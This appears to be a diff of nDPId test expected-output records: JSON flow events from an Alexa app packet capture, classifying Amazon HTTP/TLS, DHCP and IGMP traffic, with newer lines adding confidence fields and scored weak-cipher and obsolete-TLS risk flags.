-00659{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":129,"flow_state":"finished","flow_packets_processed":47,"flow_first_seen":1490976139643,"flow_last_seen":1490976140773,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":30483,"flow_avg_l4_payload_len":648,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51995,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}}
-00659{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":130,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1490976139643,"flow_last_seen":1490976140773,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":13859,"flow_avg_l4_payload_len":494,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51996,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}}
-00659{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":131,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1490976139643,"flow_last_seen":1490976140781,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":15821,"flow_avg_l4_payload_len":527,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51997,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}}
-00647{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976023264,"flow_last_seen":1490976023264,"flow_idle_time":180000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":630,"flow_avg_l4_payload_len":315,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DHCP","breed":"Acceptable","category":"Network"}}
-00603{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976055356,"flow_last_seen":1490976180796,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"IGMP","breed":"Acceptable","category":"Network"}}
-00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":147,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1490976187511,"flow_last_seen":1490976190310,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":9181,"flow_avg_l4_payload_len":437,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":38757,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}}
-00627{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976089173,"flow_last_seen":1490976090510,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49627,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {}}
+00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":142,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1490976177276,"flow_last_seen":1490976187754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":12795,"flow_avg_l4_payload_len":345,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50799,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}}
+00805{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":143,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1490976186164,"flow_last_seen":1490976186790,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5152,"flow_avg_l4_payload_len":303,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50800,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}}
+00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":119,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1490976134140,"flow_last_seen":1490976135403,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":13897,"flow_avg_l4_payload_len":463,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51985,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}}
+00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":120,"flow_state":"finished","flow_packets_processed":59,"flow_first_seen":1490976134141,"flow_last_seen":1490976135403,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":31504,"flow_avg_l4_payload_len":533,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51986,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}}
+00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":121,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1490976134144,"flow_last_seen":1490976135402,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":12573,"flow_avg_l4_payload_len":483,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51987,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}}
+00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":122,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1490976134146,"flow_last_seen":1490976135403,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":14135,"flow_avg_l4_payload_len":504,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51988,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}}
+00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":123,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1490976134148,"flow_last_seen":1490976135505,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":15689,"flow_avg_l4_payload_len":506,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51989,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}}
+00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":124,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1490976134149,"flow_last_seen":1490976135403,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":14785,"flow_avg_l4_payload_len":528,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51990,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}}
+00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":126,"flow_state":"finished","flow_packets_processed":51,"flow_first_seen":1490976139642,"flow_last_seen":1490976140773,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":29286,"flow_avg_l4_payload_len":574,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51992,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}}
+00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":127,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1490976139643,"flow_last_seen":1490976140772,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":12822,"flow_avg_l4_payload_len":493,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51993,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}}
+00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":128,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1490976139643,"flow_last_seen":1490976140745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8213,"flow_avg_l4_payload_len":391,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51994,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}}
+00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":129,"flow_state":"finished","flow_packets_processed":47,"flow_first_seen":1490976139643,"flow_last_seen":1490976140773,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":30483,"flow_avg_l4_payload_len":648,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51995,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}}
+00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":130,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1490976139643,"flow_last_seen":1490976140773,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":13859,"flow_avg_l4_payload_len":494,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51996,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}}
+00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":131,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1490976139643,"flow_last_seen":1490976140781,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":15821,"flow_avg_l4_payload_len":527,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51997,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}}
+00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976023264,"flow_last_seen":1490976023264,"flow_idle_time":180000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":630,"flow_avg_l4_payload_len":315,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}}
+00629{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976055356,"flow_last_seen":1490976180796,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
+00928{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":147,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1490976187511,"flow_last_seen":1490976190310,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":9181,"flow_avg_l4_payload_len":437,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":38757,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}}
+00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976089173,"flow_last_seen":1490976090510,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49627,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {}}
 00576{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976089173,"flow_last_seen":1490976090510,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49627,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00665{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1490976186884,"flow_last_seen":1490976197347,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":15483,"flow_avg_l4_payload_len":469,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.23.94","src_port":44912,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
-00673{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1490976089426,"flow_last_seen":1490976094931,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":996,"flow_tot_l4_payload_len":1179,"flow_avg_l4_payload_len":117,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49630,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}}
-00697{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1490976107365,"flow_last_seen":1490976110047,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6884,"flow_avg_l4_payload_len":299,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40853,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8":"Weak TLS cipher"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}}
-00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":105,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1490976107365,"flow_last_seen":1490976110047,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":13077,"flow_avg_l4_payload_len":353,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40854,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8":"Weak TLS cipher"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}}
-00617{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976107366,"flow_last_seen":1490976110047,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40855,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
+00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1490976186884,"flow_last_seen":1490976197347,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":15483,"flow_avg_l4_payload_len":469,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.23.94","src_port":44912,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
+00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1490976089426,"flow_last_seen":1490976094931,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":996,"flow_tot_l4_payload_len":1179,"flow_avg_l4_payload_len":117,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49630,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}}
+00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1490976107365,"flow_last_seen":1490976110047,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6884,"flow_avg_l4_payload_len":299,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40853,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}}
+00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":105,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1490976107365,"flow_last_seen":1490976110047,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":13077,"flow_avg_l4_payload_len":353,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40854,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}}
+00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976107366,"flow_last_seen":1490976110047,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40855,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
 00578{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976107366,"flow_last_seen":1490976110047,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40855,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":107,"flow_state":"finished","flow_packets_processed":98,"flow_first_seen":1490976107455,"flow_last_seen":1490976110047,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":31431,"flow_avg_l4_payload_len":320,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40856,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8":"Weak TLS cipher"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}}
+00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":107,"flow_state":"finished","flow_packets_processed":98,"flow_first_seen":1490976107455,"flow_last_seen":1490976110047,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":31431,"flow_avg_l4_payload_len":320,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40856,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}}
 00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":31,"flow_first_seen":1490976130073,"flow_last_seen":1490976134134,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8590,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40864,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
